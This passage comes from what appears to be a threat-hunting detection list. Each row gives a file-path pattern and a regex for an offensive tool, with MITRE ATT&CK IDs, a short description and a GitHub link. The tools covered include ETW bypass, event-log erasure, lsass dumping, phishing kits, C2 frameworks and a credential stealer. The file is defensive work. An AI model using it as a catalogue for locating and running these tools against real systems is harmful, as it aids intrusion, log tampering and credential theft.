Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*\etw-fuck.exe*",".{0,1000}\\etw\-fuck\.exe.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","81","12","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" "*\ETWHash.*",".{0,1000}\\ETWHash\..{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","244","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*\ETWpatch\eventK.exe*",".{0,1000}\\ETWpatch\\eventK\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\etwunhook.cpp*",".{0,1000}\\etwunhook\.cpp.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*\etwunhook.exe*",".{0,1000}\\etwunhook\.exe.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","0","N/A","9","1","39","8","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z" "*\Evasion\Sandbox Evasion\*.c*",".{0,1000}\\Evasion\\Sandbox\sEvasion\\.{0,1000}\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\Evasion\Sandbox Evasion\*.exe*",".{0,1000}\\Evasion\\Sandbox\sEvasion\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\EventCleaner.cpp*",".{0,1000}\\EventCleaner\.cpp.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner.exe*",".{0,1000}\\EventCleaner\.exe.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner.log*",".{0,1000}\\EventCleaner\.log.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner.pdb*",".{0,1000}\\EventCleaner\.pdb.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner.sln*",".{0,1000}\\EventCleaner\.sln.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventCleaner-master*",".{0,1000}\\EventCleaner\-master.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","N/A","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\EventLogCrasher\*",".{0,1000}\\EventLogCrasher\\.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*\EventViewer-UACBypass*",".{0,1000}\\EventViewer\-UACBypass.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*\evil.dll*",".{0,1000}\\evil\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*\evil.dll*",".{0,1000}\\evil\.dll.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*\evil.ps1*",".{0,1000}\\evil\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\evil.ps1*",".{0,1000}\\evil\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\evil_pdf\*",".{0,1000}\\evil_pdf\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*\evil_script.py*",".{0,1000}\\evil_script\.py.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\EvilClippy*",".{0,1000}\\EvilClippy.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*\EvilClippy-*.zip*",".{0,1000}\\EvilClippy\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*\evilclippy.cs*",".{0,1000}\\evilclippy\.cs.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","10","10","2051","385","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z" "*\evilginx2\*",".{0,1000}\\evilginx2\\.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*\EvilLsassTwin\*",".{0,1000}\\EvilLsassTwin\\.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*\EvilnoVNC*",".{0,1000}\\EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*\EvilnoVNC\*",".{0,1000}\\EvilnoVNC\\.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*\evil-proxy.rb*",".{0,1000}\\evil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*\evil-proxy\*",".{0,1000}\\evil\-proxy\\.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*\evilrdp\*",".{0,1000}\\evilrdp\\.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*\evilscript.ps1*",".{0,1000}\\evilscript\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\evilSignatures.db*",".{0,1000}\\evilSignatures\.db.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*\EvilSln\*.suo*",".{0,1000}\\EvilSln\\.{0,1000}\.suo.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","0","N/A","10","5","402","56","2023-10-30T06:57:24Z","2023-10-11T07:39:59Z" "*\exe_to_dll\*",".{0,1000}\\exe_to_dll\\.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","0","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*\execute_shellcode.exe*",".{0,1000}\\execute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\Execute-DNSTXT-Code.ps1*",".{0,1000}\\Execute\-DNSTXT\-Code\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\Exegol-*.zip*",".{0,1000}\\Exegol\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\exegol.py*",".{0,1000}\\exegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\Exegol-images-*.zip*",".{0,1000}\\Exegol\-images\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\Exegol-images-*\*docker*",".{0,1000}\\Exegol\-images\-.{0,1000}\\.{0,1000}docker.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*\exetotext.ps1*",".{0,1000}\\exetotext\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\exfilGui.ps1*",".{0,1000}\\exfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*\exfiltrate.exe*",".{0,1000}\\exfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*\exocet.elf*",".{0,1000}\\exocet\.elf.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*\exocet.exe*",".{0,1000}\\exocet\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*\ExpandArchiveCommand.cs",".{0,1000}\\ExpandArchiveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\exploit.c",".{0,1000}\\exploit\.c","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\exploit.dll*",".{0,1000}\\exploit\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*\exploit.exe*",".{0,1000}\\exploit\.exe.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\ExploitElevate.cpp*",".{0,1000}\\ExploitElevate\.cpp.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "*\ExportCsvCommand.cs",".{0,1000}\\ExportCsvCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\exported_credentials.csv*",".{0,1000}\\exported_credentials\.csv.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*\ext_hijacker.h*",".{0,1000}\\ext_hijacker\.h.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*\ExtensionSpoof.exe*",".{0,1000}\\ExtensionSpoof\.exe.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*\ExtensionSpoof.sln*",".{0,1000}\\ExtensionSpoof\.sln.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*\ExtensionSpoofer\*",".{0,1000}\\ExtensionSpoofer\\.{0,1000}","offensive_tool_keyword","ExtensionSpoofer","Spoof file icons and extensions in Windows","T1036 - T1027.005 - T1218","TA0005 - TA0040","N/A","N/A","Phishing","https://github.com/henriksb/ExtensionSpoofer","1","0","N/A","9","2","159","61","2023-02-24T19:03:57Z","2017-11-11T16:02:17Z" "*\ExternalC2\*",".{0,1000}\\ExternalC2\\.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*\extract_wifi.exe*",".{0,1000}\\extract_wifi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\FakeCmdLine*",".{0,1000}\\FakeCmdLine.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\FastPathMITM.py*",".{0,1000}\\FastPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\fenty.py*",".{0,1000}\\fenty\.py.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*\Ferrari.ps1*",".{0,1000}\\Ferrari\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*\Fertliser.exe*",".{0,1000}\\Fertliser\.exe.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that 